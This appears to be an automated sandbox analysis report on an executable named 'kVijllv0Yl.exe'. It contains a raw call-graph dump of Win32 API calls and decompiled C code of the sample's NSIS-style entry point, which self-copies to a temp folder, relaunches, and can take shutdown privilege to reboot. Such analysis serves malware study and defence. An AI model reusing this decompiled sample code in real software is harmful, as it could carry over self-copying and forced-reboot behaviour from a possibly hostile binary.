SetFilePointer 3674->3801 3676 402e86 3677 402f01 47 API calls 3676->3677 3677->3679 3678->3659 3678->3661 3678->3663 3678->3670 3678->3679 3679->3588 3681 405da3 3 API calls 3680->3681 3682 4035f7 3681->3682 3683 4035fd 3682->3683 3684 40360f 3682->3684 3811 4059e3 wsprintfA 3683->3811 3685 40596c 3 API calls 3684->3685 3686 403630 3685->3686 3688 40364e lstrcatA 3686->3688 3690 40596c 3 API calls 3686->3690 3689 40360d 3688->3689 3802 403897 3689->3802 3690->3688 3693 405659 18 API calls 3694 403676 3693->3694 3695 4036ff 3694->3695 3697 40596c 3 API calls 3694->3697 3696 405659 18 API calls 3695->3696 3698 403705 3696->3698 3699 4036a2 3697->3699 3700 403715 LoadImageA 3698->3700 3701 405aa7 18 API calls 3698->3701 3699->3695 3705 4036be lstrlenA 3699->3705 3709 4055a3 CharNextA 3699->3709 3702 403740 RegisterClassA 3700->3702 3703 4037c9 3700->3703 3701->3700 3706 40377c SystemParametersInfoA CreateWindowExA 3702->3706 3707 4037d3 3702->3707 3704 40140b 2 API calls 3703->3704 3708 4037cf 3704->3708 3710 4036f2 3705->3710 3711 4036cc lstrcmpiA 3705->3711 3706->3703 3707->3596 3708->3707 3716 403897 19 API calls 3708->3716 3713 4036bc 3709->3713 3712 405578 3 API calls 3710->3712 3711->3710 3714 4036dc GetFileAttributesA 3711->3714 3717 4036f8 3712->3717 3713->3705 3715 4036e8 3714->3715 3715->3710 3718 4055bf 2 API calls 3715->3718 3719 4037e0 3716->3719 3812 405a85 lstrcpynA 3717->3812 3718->3710 3721 403864 3719->3721 3722 4037e8 ShowWindow LoadLibraryA 3719->3722 3813 404ef5 OleInitialize 3721->3813 3723 403807 LoadLibraryA 3722->3723 3724 40380e GetClassInfoA 3722->3724 3723->3724 3726 403822 GetClassInfoA RegisterClassA 3724->3726 3727 403838 DialogBoxParamA 3724->3727 3726->3727 3731 40140b 2 API calls 3727->3731 3728 40386a 3729 403886 3728->3729 3730 40386e 3728->3730 3732 40140b 2 API calls 3729->3732 3730->3707 3734 40140b 2 API calls 3730->3734 3733 403860 3731->3733 3732->3707 3733->3707 3734->3707 3735->3577 3828 405a85 lstrcpynA 3736->3828 3738 40566a 3739 40560c 4 API calls 3738->3739 3740 405670 3739->3740 3741 4033e3 3740->3741 3742 405ce3 5 API calls 3740->3742 3741->3596 3750 405a85 lstrcpynA 3741->3750 3747 405680 3742->3747 3743 4056ab lstrlenA 3744 4056b6 3743->3744 3743->3747 3746 405578 3 API calls 3744->3746 3745 405d7c 2 API calls 3745->3747 3748 4056bb GetFileAttributesA 3746->3748 3747->3741 3747->3743 3747->3745 3749 4055bf 2 API calls 3747->3749 3748->3741 3749->3743 3750->3619 3751->3624 3753 4035c1 3752->3753 3754 4035b7 CloseHandle 3752->3754 3755 4035d5 3753->3755 3756 4035cb CloseHandle 3753->3756 3754->3753 3829 4053aa 3755->3829 3756->3755 3759->3611 3760->3633 3762 405da3 3 API calls 3761->3762 3763 4057de 3762->3763 3764 40583b GetShortPathNameA 3763->3764 3767 405930 3763->3767 3872 40575c GetFileAttributesA CreateFileA 3763->3872 3766 405850 3764->3766 3764->3767 3766->3767 3769 405858 wsprintfA 3766->3769 3767->3633 3768 40581f CloseHandle GetShortPathNameA 3768->3767 3770 405833 3768->3770 3771 405aa7 18 API calls 3769->3771 3770->3764 3770->3767 3772 405880 3771->3772 3873 40575c GetFileAttributesA CreateFileA 3772->3873 3774 40588d 3774->3767 3775 40589c GetFileSize GlobalAlloc 3774->3775 3776 405929 CloseHandle 3775->3776 3777 4058ba ReadFile 3775->3777 3776->3767 3777->3776 3778 4058ce 3777->3778 3778->3776 3874 4056d1 lstrlenA 3778->3874 3781 4058e3 3879 405a85 lstrcpynA 3781->3879 3782 40593d 3783 4056d1 4 API calls 3782->3783 3785 4058f1 3783->3785 3786 405904 SetFilePointer WriteFile GlobalFree 3785->3786 3786->3776 3788 405320 3787->3788 3789 405314 CloseHandle 3787->3789 3788->3633 3789->3788 3791 401389 2 API calls 3790->3791 3792 401420 3791->3792 3792->3599 3793->3652 3794->3654 3796 4055cc 3795->3796 3797 4055d1 CharPrevA 3796->3797 3798 402cc7 3796->3798 3797->3796 3797->3798 3799 405a85 lstrcpynA 3798->3799 3799->3658 3800->3668 3801->3676 3803 4038ab 3802->3803 3820 4059e3 wsprintfA 3803->3820 3805 40391c 3806 405aa7 18 API calls 3805->3806 3807 403928 SetWindowTextA 3806->3807 3808 403944 3807->3808 3809 40365e 3807->3809 3808->3809 3810 405aa7 18 API calls 3808->3810 3809->3693 3810->3808 3811->3689 3812->3695 3821 403e83 3813->3821 3815 404f3f 3816 403e83 SendMessageA 3815->3816 3817 404f51 OleUninitialize 3816->3817 3817->3728 3819 404f18 3819->3815 3824 401389 3819->3824 3820->3805 3822 403e9b 3821->3822 3823 403e8c SendMessageA 3821->3823 3822->3819 3823->3822 3826 401390 3824->3826 3825 4013fe 3825->3819 3826->3825 3827 4013cb MulDiv SendMessageA 3826->3827 3827->3826 3828->3738 3830 405659 18 API calls 3829->3830 3831 4053be 3830->3831 3832 4053c7 DeleteFileA 3831->3832 3833 4053de 3831->3833 3834 403416 OleUninitialize 3832->3834 3835 40551d 3833->3835 3870 405a85 lstrcpynA 3833->3870 3834->3594 3834->3595 3835->3834 3841 405d7c 2 API calls 3835->3841 3837 405408 3838 405419 3837->3838 3839 40540c lstrcatA 3837->3839 3840 4055bf 2 API calls 3838->3840 3842 40541f 3839->3842 3840->3842 3844 405538 3841->3844 3843 40542d lstrcatA 3842->3843 3845 405438 lstrlenA FindFirstFileA 3842->3845 3843->3845 3844->3834 3847 405578 3 API calls 3844->3847 3846 405513 3845->3846 3850 40545c 3845->3850 3846->3835 3849 405542 3847->3849 3848 4055a3 CharNextA 3848->3850 3851 40573d 2 API calls 3849->3851 3850->3848 3857 4054f2 FindNextFileA 3850->3857 3863 40573d 2 API calls 3850->3863 3864 4053aa 59 API calls 3850->3864 3867 404e23 25 API calls 3850->3867 3868 404e23 25 API calls 3850->3868 3869 4057d3 38 API calls 3850->3869 3871 405a85 lstrcpynA 3850->3871 3852 405548 RemoveDirectoryA 3851->3852 3853 405553 3852->3853 3854 40556a 3852->3854 3853->3834 3855 405559 3853->3855 3856 404e23 25 API calls 3854->3856 3859 404e23 25 API calls 3855->3859 3856->3834 3857->3850 3860 40550a FindClose 3857->3860 3861 405561 3859->3861 3860->3846 3862 4057d3 38 API calls 3861->3862 3865 405568 3862->3865 3866 4054bf DeleteFileA 3863->3866 3864->3850 3865->3834 3866->3850 3867->3857 3868->3850 3869->3850 3870->3837 3871->3850 3872->3768 3873->3774 3875 405707 lstrlenA 3874->3875 3876 405711 3875->3876 3877 4056e5 lstrcmpiA 3875->3877 3876->3781 3876->3782 3877->3876 3878 4056fe CharNextA 3877->3878 3878->3875 3879->3785 4824 401ca5 4825 4029cb 18 API calls 4824->4825 4826 401cb5 SetWindowLongA 4825->4826 4827 40287d 4826->4827 4547 401a26 4548 4029cb 18 API calls 4547->4548 4549 401a2c 4548->4549 4550 4029cb 18 API calls 4549->4550 4551 4019d6 4550->4551 4828 4045aa 4829 4045d6 4828->4829 4830 4045ba 4828->4830 4832 404609 4829->4832 4833 4045dc SHGetPathFromIDListA 4829->4833 4839 40532a GetDlgItemTextA 4830->4839 4835 4045f3 SendMessageA 4833->4835 4836 4045ec 4833->4836 4834 4045c7 SendMessageA 4834->4829 4835->4832 4837 40140b 2 API calls 4836->4837 4837->4835 4839->4834 4552 402b2d 4553 402b55 4552->4553 4554 402b3c SetTimer 4552->4554 4555 402ba3 4553->4555 4556 402ba9 MulDiv 4553->4556 4554->4553 4557 402b63 wsprintfA SetWindowTextA SetDlgItemTextA 4556->4557 4557->4555 4840 401bad 4841 4029cb 18 API calls 4840->4841 4842 401bb4 4841->4842 4843 4029cb 18 API calls 4842->4843 4844 401bbe 4843->4844 4845 401bce 4844->4845 4846 4029e8 18 API calls 4844->4846 4847 401bde 4845->4847 4848 4029e8 18 API calls 4845->4848 4846->4845 4849 401be9 4847->4849 4850 401c2d 4847->4850 4848->4847 4851 4029cb 18 API calls 4849->4851 4852 4029e8 18 API calls 4850->4852 4853 401bee 4851->4853 4854 401c32 4852->4854 4855 4029cb 18 API calls 4853->4855 4856 4029e8 18 API calls 4854->4856 4857 401bf7 4855->4857 4858 401c3b FindWindowExA 4856->4858 4859 401c1d SendMessageA 4857->4859 4860 401bff SendMessageTimeoutA 4857->4860 4861 401c59 4858->4861 4859->4861 4860->4861 4559 40422e 4560 404264 4559->4560 4561 40423e 4559->4561 4563 403e9e 8 API calls 4560->4563 4562 403e37 19 API calls 4561->4562 4564 40424b SetDlgItemTextA 4562->4564 4565 404270 4563->4565 4564->4560 4566 402630 4567 4029e8 18 API calls 4566->4567 4568 402637 FindFirstFileA 4567->4568 4569 40265a 4568->4569 4573 40264a 4568->4573 4571 402661 4569->4571 4574 4059e3 wsprintfA 4569->4574 4575 405a85 lstrcpynA 4571->4575 4574->4571 4575->4573 4862 4024b0 4863 4024b5 4862->4863 4864 4024c6 4862->4864 4865 4029cb 18 API calls 4863->4865 4866 4029e8 18 API calls 4864->4866 4867 4024bc 4865->4867 4868 4024cd lstrlenA 4866->4868 4869 4024ec WriteFile 4867->4869 4870 40264e 4867->4870 4868->4867 4869->4870 3427 4015b3 3428 4029e8 18 API calls 3427->3428 3429 4015ba 3428->3429 3445 40560c CharNextA CharNextA 3429->3445 3431 40160a 3432 40162d 3431->3432 3433 40160f 3431->3433 3438 401423 25 API calls 3432->3438 3435 401423 25 API calls 3433->3435 3434 4055a3 CharNextA 3436 4015d0 CreateDirectoryA 3434->3436 3437 401616 3435->3437 3439 4015e5 GetLastError 3436->3439 3443 4015c2 3436->3443 3451 405a85 lstrcpynA 3437->3451 3441 40215b 3438->3441 3442 4015f2 GetFileAttributesA 3439->3442 3439->3443 3442->3443 3443->3431 3443->3434 3444 401621 SetCurrentDirectoryA 3444->3441 3446 405626 3445->3446 3448 405632 3445->3448 3447 40562d CharNextA 3446->3447 3446->3448 3450 40564f 3447->3450 3449 4055a3 CharNextA 3448->3449 3448->3450 3449->3448 3450->3443 3451->3444 3452 401734 3453 4029e8 18 API calls 3452->3453 3454 40173b 3453->3454 3455 401761 3454->3455 3456 401759 3454->3456 3507 405a85 lstrcpynA 3455->3507 3506 405a85 lstrcpynA 3456->3506 3459 40175f 3463 405ce3 5 API calls 3459->3463 3460 40176c 3508 405578 lstrlenA CharPrevA 3460->3508 3469 40177e 3463->3469 3467 401795 CompareFileTime 3467->3469 3468 401859 3470 404e23 25 API calls 3468->3470 3469->3467 3469->3468 3472 405a85 lstrcpynA 3469->3472 3479 405aa7 18 API calls 3469->3479 3488 401830 3469->3488 3490 40575c GetFileAttributesA CreateFileA 3469->3490 3511 405d7c FindFirstFileA 3469->3511 3514 40573d GetFileAttributesA 3469->3514 3517 405346 3469->3517 3473 401863 3470->3473 3471 404e23 25 API calls 3474 401845 3471->3474 3472->3469 3491 402f01 3473->3491 3477 40188a SetFileTime 3478 40189c FindCloseChangeNotification 3477->3478 3478->3474 3480 4018ad 3478->3480 3479->3469 3481 4018b2 3480->3481 3482 4018c5 3480->3482 3483 405aa7 18 API calls 3481->3483 3484 405aa7 18 API calls 3482->3484 3486 4018ba lstrcatA 3483->3486 3487 4018cd 3484->3487 3486->3487 3489 405346 MessageBoxIndirectA 3487->3489 3488->3471 3488->3474 3489->3474 3490->3469 3492 402f12 SetFilePointer 3491->3492 3493 402f2e 3491->3493 3492->3493 3521 40302c GetTickCount 3493->3521 3496 402f3f ReadFile 3497 402f5f 3496->3497 3502 401876 3496->3502 3498 40302c 42 API calls 3497->3498 3497->3502 3499 402f76 3498->3499 3500 402ff1 ReadFile 3499->3500 3499->3502 3503 402f86 3499->3503 3500->3502 3502->3477 3502->3478 3503->3502 3504 402fa1 ReadFile 3503->3504 3505 402fba WriteFile 3503->3505 3504->3502 3504->3503 3505->3502 3505->3503 3506->3459 3507->3460 3509 405592 lstrcatA 3508->3509 3510 401772 lstrcatA 3508->3510 3509->3510 3510->3459 3512 405d92 FindClose 3511->3512 3513 405d9d 3511->3513 3512->3513 3513->3469 3515 405759 3514->3515 3516 40574c SetFileAttributesA 3514->3516 3515->3469 3516->3515 3518 40535b 3517->3518 3519 4053a7 3518->3519 3520 40536f MessageBoxIndirectA 3518->3520 3519->3469 3520->3519 3522 403196 3521->3522 3523 40305b 3521->3523 3524 402bc5 32 API calls 3522->3524 3534 4031da SetFilePointer 3523->3534 3530 402f37 3524->3530 3526 403066 SetFilePointer 3531 40308b 3526->3531 3530->3496 3530->3502 3531->3530 3532 403120 WriteFile 3531->3532 3533 403177 SetFilePointer 3531->3533 3535 4031a8 ReadFile 3531->3535 3537 405e9d 3531->3537 3544 402bc5 3531->3544 3532->3530 3532->3531 3533->3522 3534->3526 3536 4031c9 3535->3536 3536->3531 3538 405ec2 3537->3538 3539 405eca 3537->3539 3538->3531 3539->3538 3540 405f51 GlobalFree 3539->3540 3541 405f5a GlobalAlloc 3539->3541 3542 405fd1 GlobalAlloc 3539->3542 3543 405fc8 GlobalFree 3539->3543 3540->3541 3541->3538 3541->3539 3542->3538 3542->3539 3543->3542 3545 402bd3 3544->3545 3546 402beb 3544->3546 3547 402bdc DestroyWindow 3545->3547 3550 402be3 3545->3550 3548 402bf3 3546->3548 3549 402bfb GetTickCount 3546->3549 3547->3550 3559 405ddc 3548->3559 3549->3550 3552 402c09 3549->3552 3550->3531 3553 402c11 3552->3553 3554 402c3e CreateDialogParamA 3552->3554 3553->3550 3563 402ba9 3553->3563 3554->3550 3556 402c1f wsprintfA 3557 404e23 25 API calls 3556->3557 3558 402c3c 3557->3558 3558->3550 3560 405df9 PeekMessageA 3559->3560 3561 405e09 3560->3561 3562 405def DispatchMessageA 3560->3562 3561->3550 3562->3560 3564 402bb8 3563->3564 3565 402bba MulDiv 3563->3565 3564->3565 3565->3556 4583 401634 4584 4029e8 18 API calls 4583->4584 4585 40163a 4584->4585 4586 405d7c 2 API calls 4585->4586 4587 401640 4586->4587 4588 401934 4589 4029cb 18 API calls 4588->4589 4590 40193b 4589->4590 4591 4029cb 18 API calls 4590->4591 4592 401945 4591->4592 4593 4029e8 18 API calls 4592->4593 4594 40194e 4593->4594 4595 401961 lstrlenA 4594->4595 4600 40199c 4594->4600 4596 40196b 4595->4596 4596->4600 4601 405a85 lstrcpynA 4596->4601 4598 401985 4599 401992 lstrlenA 4598->4599 4598->4600 4599->4600 4601->4598 4871 4019b5 4872 4029e8 18 API calls 4871->4872 4873 4019bc 4872->4873 4874 4029e8 18 API calls 4873->4874 4875 4019c5 4874->4875 4876 4019cc lstrcmpiA 4875->4876 4877 4019de lstrcmpA 4875->4877 4878 4019d2 4876->4878 4877->4878 4879 4014b7 4880 4014bd 4879->4880 4881 401389 2 API calls 4880->4881 4882 4014c5 4881->4882 4883 4025be 4884 4025c5 4883->4884 4886 40282a 4883->4886 4885 4029cb 18 API calls 4884->4885 4887 4025d0 4885->4887 4888 4025d7 SetFilePointer 4887->4888 4888->4886 4889 4025e7 4888->4889 4891 4059e3 wsprintfA 4889->4891 4891->4886

                  Executed Functions

                  Function 00403225 Relevance: 70.3, APIs: 23, Strings: 17, Instructions: 270filestringcomCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 0 403225-4032ba #17 SetErrorMode OleInitialize call 405da3 SHGetFileInfoA call 405a85 GetCommandLineA call 405a85 GetModuleHandleA 7 4032c6-4032db call 4055a3 CharNextA 0->7 8 4032bc-4032c1 0->8 11 403340-403344 7->11 8->7 12 403346 11->12 13 4032dd-4032e0 11->13 16 403359-403371 GetTempPathA call 4031f1 12->16 14 4032e2-4032e6 13->14 15 4032e8-4032f0 13->15 14->14 14->15 17 4032f2-4032f3 15->17 18 4032f8-4032fb 15->18 25 403393-4033aa DeleteFileA call 402c5b 16->25 26 403373-403391 GetWindowsDirectoryA lstrcatA call 4031f1 16->26 17->18 20 403330-40333d call 4055a3 18->20 21 4032fd-403301 18->21 20->11 38 40333f 20->38 23 403311-403317 21->23 24 403303-40330c 21->24 30 403327-40332e 23->30 31 403319-403322 23->31 24->23 28 40330e 24->28 40 403411-403420 call 4035a6 OleUninitialize 25->40 41 4033ac-4033b2 25->41 26->25 26->40 28->23 30->20 36 403348-403354 call 405a85 30->36 31->30 35 403324 31->35 35->30 36->16 38->11 48 403426-403436 call 405346 ExitProcess 40->48 49 40350b-403511 40->49 43 403401-403408 call 4035e3 41->43 44 4033b4-4033bd call 4055a3 41->44 50 40340d 43->50 52 4033c8-4033ca 44->52 54 403513-403530 call 405da3 * 3 49->54 55 40358e-403596 49->55 50->40 58 4033cc-4033d6 52->58 59 4033bf-4033c5 52->59 80 403532-403534 54->80 81 40357a-403585 ExitWindowsEx 54->81 56 403598 55->56 57 40359c-4035a0 ExitProcess 55->57 56->57 63 4033d8-4033e5 call 405659 58->63 64 40343c-403456 lstrcatA lstrcmpiA 58->64 59->58 62 4033c7 59->62 62->52 63->40 74 4033e7-4033fd call 405a85 * 2 63->74 64->40 68 403458-40346d CreateDirectoryA SetCurrentDirectoryA 64->68 71 40347a-403494 call 405a85 68->71 72 40346f-403475 call 405a85 68->72 83 403499-4034b5 call 405aa7 DeleteFileA 71->83 72->71 74->43 80->81 84 403536-403538 80->84 81->55 87 403587-403589 call 40140b 81->87 92 4034f6-4034fd 83->92 93 4034b7-4034c7 CopyFileA 83->93 84->81 88 40353a-40354c GetCurrentProcess 84->88 87->55 88->81 98 40354e-403570 88->98 92->83 96 4034ff-403506 call 4057d3 92->96 93->92 94 4034c9-4034e9 call 4057d3 call 405aa7 call 4052e5 93->94 94->92 107 4034eb-4034f2 CloseHandle 94->107 96->40 98->81 107->92
                  C-Code - Quality: 82%
                  			_entry_() {
				struct _SHFILEINFOA _v360;
				struct _SECURITY_ATTRIBUTES* _v376;
				char _v380;
				CHAR* _v384;
				char _v396;
				int _v400;
				int _v404;
				CHAR* _v408;
				intOrPtr _v412;
				int _v416;
				intOrPtr _v420;
				struct _SECURITY_ATTRIBUTES* _v424;
				void* _v432;
				int _t34;
				CHAR* _t39;
				char* _t42;
				signed int _t44;
				void* _t48;
				intOrPtr _t50;
				signed int _t52;
				signed int _t55;
				int _t56;
				signed int _t60;
				void* _t79;
				void* _t89;
				void* _t91;
				char* _t96;
				signed int _t97;
				void* _t98;
				signed int _t99;
				signed int _t100;
				signed int _t103;
				CHAR* _t105;
				signed int _t106;
				char _t120;

				_v376 = 0;
				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
				_t99 = 0;
				_v380 = 0x20;
				__imp__#17();
				_t34 = SetErrorMode(0x8001); // executed
				__imp__OleInitialize(0); // executed
				 *0x423f58 = _t34;
				 *0x423ea4 = E00405DA3(8);
				SHGetFileInfoA(0x41f450, 0,  &_v360, 0x160, 0); // executed
				E00405A85(0x4236a0, "NSIS Error");
				_t39 = GetCommandLineA();
				_t96 = "\"C:\\Users\\engineer\\Desktop\\kVijllv0Yl.exe\" ";
				E00405A85(_t96, _t39);
				 *0x423ea0 = GetModuleHandleA(0);
				_t42 = _t96;
				if("\"C:\\Users\\engineer\\Desktop\\kVijllv0Yl.exe\" " == 0x22) {
					_v404 = 0x22;
					_t42 =  &M00429001;
				}
				_t44 = CharNextA(E004055A3(_t42, _v404));
				_v404 = _t44;
				while(1) {
					_t91 =  *_t44;
					_t109 = _t91;
					if(_t91 == 0) {
						break;
					}
					__eflags = _t91 - 0x20;
					if(_t91 != 0x20) {
						L5:
						__eflags =  *_t44 - 0x22;
						_v404 = 0x20;
						if( *_t44 == 0x22) {
							_t44 = _t44 + 1;
							__eflags = _t44;
							_v404 = 0x22;
						}
						__eflags =  *_t44 - 0x2f;
						if( *_t44 != 0x2f) {
							L15:
							_t44 = E004055A3(_t44, _v404);
							__eflags =  *_t44 - 0x22;
							if(__eflags == 0) {
								_t44 = _t44 + 1;
								__eflags = _t44;
							}
							continue;
						} else {
							_t44 = _t44 + 1;
							__eflags =  *_t44 - 0x53;
							if( *_t44 == 0x53) {
								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000002;
									__eflags = _t99;
								}
							}
							__eflags =  *_t44 - 0x4352434e;
							if( *_t44 == 0x4352434e) {
								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000004;
									__eflags = _t99;
								}
							}
							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t44 - 2)) = 0;
								__eflags = _t44 + 2;
								E00405A85("C:\\Users\\engineer\\AppData\\Local\\Temp", _t44 + 2);
								L20:
								_t105 = "C:\\Users\\engineer\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t105);
								_t48 = E004031F1(_t109);
								_t110 = _t48;
								if(_t48 != 0) {
									L22:
									DeleteFileA("1033"); // executed
									_t50 = E00402C5B(_t111, _t99); // executed
									_v412 = _t50;
									if(_t50 != 0) {
										L32:
										E004035A6();
										__imp__OleUninitialize();
										if(_v408 == 0) {
											__eflags =  *0x423f34;
											if( *0x423f34 != 0) {
												_t106 = E00405DA3(3);
												_t100 = E00405DA3(4);
												_t55 = E00405DA3(5);
												__eflags = _t106;
												_t97 = _t55;
												if(_t106 != 0) {
													__eflags = _t100;
													if(_t100 != 0) {
														__eflags = _t97;
														if(_t97 != 0) {
															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
															__eflags = _t60;
															if(_t60 != 0) {
																 *_t100(0, "SeShutdownPrivilege",  &_v400);
																_v416 = 1;
																_v404 = 2;
																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
															}
														}
													}
												}
												_t56 = ExitWindowsEx(2, 0);
												__eflags = _t56;
												if(_t56 == 0) {
													E0040140B(9);
												}
											}
											_t52 =  *0x423f4c;
											__eflags = _t52 - 0xffffffff;
											if(_t52 != 0xffffffff) {
												_v400 = _t52;
											}
											ExitProcess(_v400);
										}
										E00405346(_v408, 0x200010);
										ExitProcess(2);
									}
									if( *0x423ebc == 0) {
										L31:
										 *0x423f4c =  *0x423f4c | 0xffffffff;
										_v400 = E004035E3();
										goto L32;
									}
									_t103 = E004055A3(_t96, 0);
									while(_t103 >= _t96) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t115 = _t103 - _t96;
									_v408 = "Error launching installer";
									if(_t103 < _t96) {
										lstrcatA(_t105, "~nsu.tmp");
										if(lstrcmpiA(_t105, "C:\\Users\\engineer\\Desktop") == 0) {
											goto L32;
										}
										CreateDirectoryA(_t105, 0);
										SetCurrentDirectoryA(_t105);
										_t120 = "C:\\Users\\engineer\\AppData\\Local\\Temp"; // 0x43
										if(_t120 == 0) {
											E00405A85("C:\\Users\\engineer\\AppData\\Local\\Temp", "C:\\Users\\engineer\\Desktop");
										}
										E00405A85(0x424000, _v396);
										 *0x424400 = 0x41;
										_t98 = 0x1a;
										do {
											E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)( *0x423eb0 + 0x120)));
											DeleteFileA(0x41f050);
											if(_v416 != 0 && CopyFileA("C:\\Users\\engineer\\Desktop\\kVijllv0Yl.exe", 0x41f050, 1) != 0) {
												_push(0);
												_push(0x41f050);
												E004057D3();
												E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)( *0x423eb0 + 0x124)));
												_t79 = E004052E5(0x41f050);
												if(_t79 != 0) {
													CloseHandle(_t79);
													_v416 = 0;
												}
											}
											 *0x424400 =  *0x424400 + 1;
											_t98 = _t98 - 1;
										} while (_t98 != 0);
										_push(0);
										_push(_t105);
										E004057D3();
										goto L32;
									}
									 *_t103 = 0;
									_t104 = _t103 + 4;
									if(E00405659(_t115, _t103 + 4) == 0) {
										goto L32;
									}
									E00405A85("C:\\Users\\engineer\\AppData\\Local\\Temp", _t104);
									E00405A85("C:\\Users\\engineer\\AppData\\Local\\Temp", _t104);
									_v424 = 0;
									goto L31;
								}
								GetWindowsDirectoryA(_t105, 0x3fb);
								lstrcatA(_t105, "\\Temp");
								_t89 = E004031F1(_t110);
								_t111 = _t89;
								if(_t89 == 0) {
									goto L32;
								}
								goto L22;
							}
							goto L15;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						_t44 = _t44 + 1;
						__eflags =  *_t44 - 0x20;
					} while ( *_t44 == 0x20);
					goto L5;
				}
				goto L20;
			}






































                  0x00403231
                  0x00403235
                  0x0040323d
                  0x0040323f
                  0x00403244
                  0x0040324f
                  0x00403256
                  0x0040325e
                  0x00403268
                  0x0040327e
                  0x0040328e
                  0x00403293
                  0x00403299
                  0x004032a0
                  0x004032b3
                  0x004032b8
                  0x004032ba
                  0x004032bc
                  0x004032c1
                  0x004032c1
                  0x004032d1
                  0x004032d7
                  0x00403340
                  0x00403340
                  0x00403342
                  0x00403344
                  0x00000000
                  0x00000000
                  0x004032dd
                  0x004032e0
                  0x004032e8
                  0x004032e8
                  0x004032eb
                  0x004032f0
                  0x004032f2
                  0x004032f2
                  0x004032f3
                  0x004032f3
                  0x004032f8
                  0x004032fb
                  0x00403330
                  0x00403335
                  0x0040333a
                  0x0040333d
                  0x0040333f
                  0x0040333f
                  0x0040333f
                  0x00000000
                  0x004032fd
                  0x004032fd
                  0x004032fe
                  0x00403301
                  0x00403309
                  0x0040330c
                  0x0040330e
                  0x0040330e
                  0x0040330e
                  0x0040330c
                  0x00403311
                  0x00403317
                  0x0040331f
                  0x00403322
                  0x00403324
                  0x00403324
                  0x00403324
                  0x00403322
                  0x00403327
                  0x0040332e
                  0x00403348
                  0x0040334b
                  0x00403354
                  0x00403359
                  0x00403359
                  0x00403364
                  0x0040336a
                  0x0040336f
                  0x00403371
                  0x00403393
                  0x00403398
                  0x0040339f
                  0x004033a6
                  0x004033aa
                  0x00403411
                  0x00403411
                  0x00403416
                  0x00403420
                  0x0040350b
                  0x00403511
                  0x0040351c
                  0x00403525
                  0x00403527
                  0x0040352c
                  0x0040352e
                  0x00403530
                  0x00403532
                  0x00403534
                  0x00403536
                  0x00403538
                  0x00403548
                  0x0040354a
                  0x0040354c
                  0x00403559
                  0x00403568
                  0x00403570
                  0x00403578
                  0x00403578
                  0x0040354c
                  0x00403538
                  0x00403534
                  0x0040357d
                  0x00403583
                  0x00403585
                  0x00403589
                  0x00403589
                  0x00403585
                  0x0040358e
                  0x00403593
                  0x00403596
                  0x00403598
                  0x00403598
                  0x004035a0
                  0x004035a0
                  0x0040342f
                  0x00403436
                  0x00403436
                  0x004033b2
                  0x00403401
                  0x00403401
                  0x0040340d
                  0x00000000
                  0x0040340d
                  0x004033bb
                  0x004033c8
                  0x004033bf
                  0x004033c5
                  0x00000000
                  0x00000000
                  0x004033c7
                  0x004033c7
                  0x004033c7
                  0x004033cc
                  0x004033ce
                  0x004033d6
                  0x00403442
                  0x00403456
                  0x00000000
                  0x00000000
                  0x0040345a
                  0x00403461
                  0x00403467
                  0x0040346d
                  0x00403475
                  0x00403475
                  0x00403483
                  0x0040348a
                  0x00403493
                  0x00403499
                  0x004034a5
                  0x004034ab
                  0x004034b5
                  0x004034c9
                  0x004034ca
                  0x004034cb
                  0x004034dc
                  0x004034e2
                  0x004034e9
                  0x004034ec
                  0x004034f2
                  0x004034f2
                  0x004034e9
                  0x004034f6
                  0x004034fc
                  0x004034fc
                  0x004034ff
                  0x00403500
                  0x00403501
                  0x00000000
                  0x00403501
                  0x004033d8
                  0x004033da
                  0x004033e5
                  0x00000000
                  0x00000000
                  0x004033ed
                  0x004033f8
                  0x004033fd
                  0x00000000
                  0x004033fd
                  0x00403379
                  0x00403385
                  0x0040338a
                  0x0040338f
                  0x00403391
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00403391
                  0x00000000
                  0x0040332e
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004032e2
                  0x004032e2
                  0x004032e2
                  0x004032e3
                  0x004032e3
                  0x00000000
                  0x004032e2
                  0x00000000

                  APIs
                  • #17.COMCTL32 ref: 00403244
                  • SetErrorMode.KERNELBASE(00008001), ref: 0040324F
                  • OleInitialize.OLE32(00000000), ref: 00403256
                    • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                    • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                    • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                  • SHGetFileInfoA.SHELL32(0041F450,00000000,?,00000160,00000000,00000008), ref: 0040327E
                    • Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,004236A0,NSIS Error), ref: 00405A92
                  • GetCommandLineA.KERNEL32(004236A0,NSIS Error), ref: 00403293
                  • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\kVijllv0Yl.exe" ,00000000), ref: 004032A6
                  • CharNextA.USER32(00000000,"C:\Users\user\Desktop\kVijllv0Yl.exe" ,00000020), ref: 004032D1
                  • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403364
                  • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403379
                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403385
